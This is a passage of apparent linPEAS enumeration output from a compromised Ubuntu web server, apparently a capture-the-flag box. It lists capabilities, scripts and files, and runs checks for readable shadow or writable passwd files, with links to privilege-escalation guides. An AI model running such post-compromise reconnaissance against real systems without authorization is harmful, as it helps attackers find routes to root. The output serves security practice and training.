Files with capabilities (limited to 50):
|
|
/usr/bin/mtr-packet = cap_net_raw+ep
|
|
|
|
╔══════════╣ Users with capabilities
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
|
|
|
|
╔══════════╣ AppArmor binary profiles
|
|
-rw-r--r-- 1 root root 3194 Mar 26 2018 sbin.dhclient
|
|
-rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start
|
|
-rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man
|
|
-rw-r--r-- 1 root root 28486 Nov 28 04:56 usr.lib.snapd.snap-confine.real
|
|
-rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd
|
|
-rw-r--r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump
|
|
|
|
╔══════════╣ Files with ACLs (limited to 50)
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
|
|
files with acls in searched folders Not Found
|
|
|
|
╔══════════╣ .sh files in path
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
|
|
/usr/local/sbin/cleancache.sh
|
|
/usr/bin/gettext.sh
|
|
|
|
╔══════════╣ Executable files potentially added by user (limit 70)
|
|
2023-02-12+11:35:47.5262858350 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
|
|
2023-02-12+11:35:47.5233455830 /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
|
|
2023-02-12+11:35:47.5193169360 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
|
|
2023-02-12+11:35:47.5144354070 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.5108056660 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
|
|
2023-02-12+11:35:47.5063616340 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.5014851400 /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4949269720 /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4863812300 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
|
|
2023-02-12+11:35:47.4799478780 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4738381840 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4631773480 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.4262852130 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
|
|
2023-02-12+11:35:47.4234191460 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4202998740 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4170212400 /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4141705950 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4113842460 /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4083850090 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4049923800 /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
|
|
2023-02-12+11:35:47.4016353930 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.3982935590 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3940425300 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
|
|
2023-02-12+11:35:47.3897399070 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3866268420 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3834444920 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3803600670 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3771589270 /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3739546510 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.3706797350 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3675222700 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3640197090 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntu\x2d\x2dvg\x2dswap.swap/cgroup.event_control
|
|
2023-02-12+11:35:47.3606448570 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.3571659270 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.3527322630 /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3484020380 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
|
|
2023-02-12+11:35:47.3413328120 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3322267170 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3270985900 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3233772660 /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3197360280 /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
|
|
2023-02-12+11:35:47.3166884870 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
|
|
2023-02-12+11:35:47.3126134820 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
|
|
2023-02-12+11:35:47.3092801180 /var/lib/lxcfs/cgroup/memory/cgroup.event_control
|
|
2023-02-08+12:57:17.7808908480 /usr/local/sbin/cleancache.sh
|
|
2023-01-13+10:54:47.4696015670 /usr/local/sbin/laurel
|
|
2022-11-20+21:59:04.6543265010 /var/www/api/vendor/sabberworm/php-css-parser/bin/quickdump.php
|
|
2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/demo/index.php
|
|
2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/README.md
|
|
2022-11-20+21:53:41.5014786250 /usr/local/bin/composer
|
|
|
|
╔══════════╣ Unexpected in root
|
|
/vmlinuz
|
|
/initrd.img.old
|
|
/vmlinuz.old
|
|
/initrd.img
|
|
|
|
╔══════════╣ Files (scripts) in /etc/profile.d/
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
|
|
total 36
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:01 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
|
|
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
|
|
-rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh
|
|
-rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh
|
|
-rw-r--r-- 1 root root 835 Feb 23 2022 apps-bin-path.sh
|
|
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
|
|
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
|
|
|
|
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
|
|
|
|
═╣ Hashes inside passwd file? ........... No
|
|
═╣ Writable passwd file? ................ No
|
|
═╣ Credentials in fstab/mtab? ........... No
|
|
═╣ Can I read shadow files? ............. No
|
|
═╣ Can I read shadow plists? ............ No
|
|
═╣ Can I write shadow plists? ........... No
|
|
═╣ Can I read opasswd file? ............. No
|
|
═╣ Can I write in network-scripts? ...... No
|
|
═╣ Can I read root folder? .............. No
|
|
|
|
╔══════════╣ Searching root files in home dirs (limit 30)
|
|
/home/
|
|
/home/dev/.bash_history
|
|
/root/
|
|
/var/www/html
|
|
/var/www/starting-page/blog/.next/trace
|
|
/var/www/starting-page/blog/.next/static
|
|
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN
|
|
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
|
|
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
|
|
/var/www/starting-page/blog/.next/static/chunks
|
|
/var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js
|
|
/var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js
|
|
/var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js
|
|
/var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js
|
|
/var/www/starting-page/blog/.next/export-marker.json
|
|
/var/www/starting-page/blog/.next/routes-manifest.json
|
|
/var/www/starting-page/blog/.next/build-manifest.json
|
|
/var/www/starting-page/blog/.next/package.json
|
|
/var/www/starting-page/blog/.next/BUILD_ID
|
|
/var/www/starting-page/blog/.next/cache/webpack/client-production/1.pack
|
|
/var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack
|
|
/var/www/starting-page/blog/.next/cache/webpack/client-production/2.pack
|
|
/var/www/starting-page/blog/.next/cache/webpack/client-production/0.pack
|
|
/var/www/starting-page/blog/.next/next-server.js.nft.json
|
|
/var/www/starting-page/blog/.next/react-loadable-manifest.json
|
|
/var/www/starting-page/blog/.next/images-manifest.json
|
|
|
|
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
|
|
/var/www
|
|
/var/www/starting-page/blog/.next
|
|
/var/www/starting-page/blog/.next/cache/webpack/client-production
|
|
|
|
╔══════════╣ Readable files belonging to root and readable by me but not world readable
|
|
|
|
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
|
|
/var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
|
|
/var/log/syslog
|
|
/var/log/auth.log
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000bf706-0005f47f108202aa.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d1e3d-0005f47f18f9fd82.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000e017f-0005f47f1f5c4a0e.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c7f2d-0005f47f147af12a.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c2435-0005f47f11d3b2ac.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c0db6-0005f47f112903ce.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c6870-0005f47f13cf3936.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dea14-0005f47f1ebad133.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c3b13-0005f47f127c6a10.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dd3b1-0005f47f1e1a54d0.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d4b86-0005f47f1a485023.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cc316-0005f47f166bbf4d.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c95af-0005f47f1520b2c7.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cd9f8-0005f47f1713b635.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cac9c-0005f47f15c776b3.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c5194-0005f47f13224628.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d8fba-0005f47f1c310ae1.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dbcdd-0005f47f1d711955.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d6266-0005f47f1ae82f6e.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d78e0-0005f47f1b832340.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cf0dd-0005f47f17b3e3cc.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d075e-0005f47f185b96a2.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d34ba-0005f47f199f22b2.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000da62c-0005f47f1cd51824.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system.journal
|
|
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000e1d9e-0005f47f1fd47a57.journal
|
|
|
|
logrotate 3.11.0
|
|
|
|
╔══════════╣ Files inside /var/www (limit 20)
|
|
total 28
|
|
drwxr-xr-x 7 www-data www-data 4096 Feb 12 10:54 .
|
|
drwxr-xr-x 14 root root 4096 Jan 16 09:49 ..
|
|
drwx------ 4 www-data www-data 4096 Feb 12 10:43 .config
|
|
drwx------ 3 www-data www-data 4096 Feb 12 10:54 .gnupg
|
|
drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 api
|
|
drwxr-xr-x 2 root root 4096 Jan 31 14:01 html
|
|
drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 starting-page
|
|
|
|
╔══════════╣ Files inside others home (limit 20)
|
|
/home/dev/.bashrc
|
|
/home/dev/.bash_logout
|
|
/home/dev/user.txt
|
|
/home/dev/.profile
|
|
/var/www/.config/configstore/update-notifier-npm.json
|
|
/var/www/.config/lxc/config.yml
|
|
/var/www/starting-page/blog/pages/index.js
|
|
/var/www/starting-page/blog/package.json
|
|
/var/www/starting-page/blog/.next/trace
|
|
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
|
|
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
|
|
/var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js
|
|
/var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js
|
|
/var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js
|
|
/var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js
|
|
/var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js
|
|
/var/www/starting-page/blog/.next/export-marker.json
|
|
/var/www/starting-page/blog/.next/routes-manifest.json
|
|
grep: write error: Broken pipe
|
|
|
|
╔══════════╣ Searching installed mail applications
|
|
|
|
╔══════════╣ Mails (limit 50)
|
|
|
|
╔══════════╣ Backup files (limited 100)
|
|
-rw-r--r-- 1 root root 11755 Jan 12 10:12 /usr/share/info/dir.old
|
|
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
|
|
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
|
|
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
|
|
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
|
|
-rw-r--r-- 1 root root 217559 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/.config.old
|
|
-rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/wm831x/backup.h
|
|
-rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/net/team/mode/activebackup.h
|
|
-rw-r--r-- 1 root root 217559 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/.config.old
|
|
-rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/wm831x/backup.h
|
|
-rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/net/team/mode/activebackup.h
|
|
-rw-r--r-- 1 root root 35544 Sep 19 22:14 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
|
|
-rw-r--r-- 1 root root 1802 Aug 15 20:07 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
|
|
-rw-r--r-- 1 root root 1391 Nov 20 21:44 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
|
|
-rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old
|
|
-rw-r--r-- 1 www-data www-data 387580 Nov 20 22:07 /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack.old
|
|
-rw-r--r-- 1 root root 8881 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/net/team/team_mode_activebackup.ko
|
|
-rw-r--r-- 1 root root 9081 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/power/supply/wm831x_backup.ko
|
|
-rw-r--r-- 1 root root 8881 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/net/team/team_mode_activebackup.ko
|
|
-rw-r--r-- 1 root root 9081 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/power/supply/wm831x_backup.ko
|
|
|
|
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
|
|
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
|
|
|
|
|
|
╔══════════╣ Web files?(output limit)
|
|
/var/www/:
|
|
total 28K
|
|
drwxr-xr-x 7 www-data www-data 4.0K Feb 12 10:54 .
|
|
drwxr-xr-x 14 root root 4.0K Jan 16 09:49 ..
|
|
drwx------ 4 www-data www-data 4.0K Feb 12 10:43 .config
|
|
drwx------ 3 www-data www-data 4.0K Feb 12 10:54 .gnupg
|
|
drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 api
|
|
drwxr-xr-x 2 root root 4.0K Jan 31 14:01 html
|
|
drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 starting-page
|
|
|
|
|
|
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
|
|
-rw-rw-r-- 1 root root 21858 Feb 8 12:48 /usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/Image/ExifTool/.packlist
|
|
-rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc
|
|
-rw-r--r-- 1 root root 3274 Nov 4 11:35 /usr/lib/node_modules/npm/.mailmap
|
|
-rw-r--r-- 1 root root 245 Nov 4 11:35 /usr/lib/node_modules/npm/.licensee.json
|
|
-rw-r--r-- 1 root root 126 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/lockfile/.travis.yml
|
|
-rw-r--r-- 1 root root 54 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through/.travis.yml
|
|
-rw-r--r-- 1 root root 116 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mkdirp/node_modules/minimist/.travis.yml
|
|
-rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.prettierrc.yaml
|
|
-rw-r--r-- 1 root root 152 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.travis.yml
|
|
-rw-r--r-- 1 root root 4770 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.travis.yml
|
|
-rw-r--r-- 1 root root 4140 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.jscs.json
|
|
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/builtins/.travis.yml
|
|
-rw-r--r-- 1 root root 715 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.editorconfig
|
|
-rw-r--r-- 1 root root 2935 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.eslintrc.js
|
|
-rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sorted-union-stream/.travis.yml
|
|
-rw-r--r-- 1 root root 113 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/getpass/.travis.yml
|
|
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/node_modules/readable-stream/.travis.yml
|
|
-rw-r--r-- 1 root root 60 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/.travis.yml
|
|
-rw-r--r-- 1 root root 562 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.eslintrc.yml
|
|
-rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.travis.yml
|
|
-rw-r--r-- 1 root root 1160 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/color-name/.eslintrc.json
|
|
-rw-r--r-- 1 root root 119 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/prr/.travis.yml
|
|
-rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/node_modules/pump/.travis.yml
|
|
-rw-r--r-- 1 root root 68 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/.travis.yml
|
|
-rw-r--r-- 1 root root 277 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.editorconfig
|
|
-rw-r--r-- 1 root root 127 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.travis.yml
|
|
-rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.prettierrc.yaml
|
|
-rw-r--r-- 1 root root 185 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.travis.yml
|
|
-rw-r--r-- 1 root root 69 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/util-promisify/.travis.yml
|
|
-rw-r--r-- 1 root root 334 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/retry/.travis.yml
|
|
-rw-r--r-- 1 root root 286 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.editorconfig
|
|
-rw-r--r-- 1 root root 13 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.eslintignore
|
|
-rw-r--r-- 1 root root 8082 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.travis.yml
|
|
-rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-each/.travis.yml
|
|
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/node_modules/readable-stream/.travis.yml
|
|
-rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/.travis.yml
|
|
-rw-r--r-- 1 root root 59 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/JSONStream/.travis.yml
|
|
-rw-r--r-- 1 root root 3817 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/node-gyp/.travis.yml
|
|
-rw-r--r-- 1 root root 193 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.tm_properties
|
|
-rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.travis.yml
|
|
-rw-r--r-- 1 root root 421 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.eslintrc
|
|
-rw-r--r-- 1 root root 215 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.travis.yml
|
|
-rw-r--r-- 1 root root 150 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isstream/.travis.yml
|
|
-rw-r--r-- 1 root root 134 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mute-stream/.travis.yml
|
|
-rw-r--r-- 1 root root 38 Oct 14 2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml
|
|
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmsearch/.travis.yml
|
|
-rw-r--r-- 1 root root 189 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sshpk/.travis.yml
|
|
-rw-r--r-- 1 root root 276 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.editorconfig
|
|
-rw-r--r-- 1 root root 6986 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.travis.yml
|
|
-rw-r--r-- 1 root root 4108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.jscs.json
|
|
-rw-r--r-- 1 root root 178 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/http-signature/.dir-locals.el
|
|
-rw-r--r-- 1 root root 36 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/require-directory/.travis.yml
|
|
-rw-r--r-- 1 root root 91 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/spec/.eslintrc.yml
|
|
-rw-r--r-- 1 root root 630 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.eslintrc.yml
|
|
-rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.travis.yml
|
|
-rw-r--r-- 1 root root 439 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/.tonic_example.js
|
|
-rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/scripts/.eslintrc.yml
|
|
-rw-r--r-- 1 root root 1151 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.travis.yml
|
|
-rw-r--r-- 1 root root 2878 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.jscs.json
|
|
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isarray/.travis.yml
|
|
-rw-r--r-- 1 root root 77 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/errno/.travis.yml
|
|
-rw-r--r-- 1 root root 6 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.eslintignore
|
|
-rw-r--r-- 1 root root 52 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.travis.yml
|
|
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/typedarray/.travis.yml
|
|
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmorg/.travis.yml
|
|
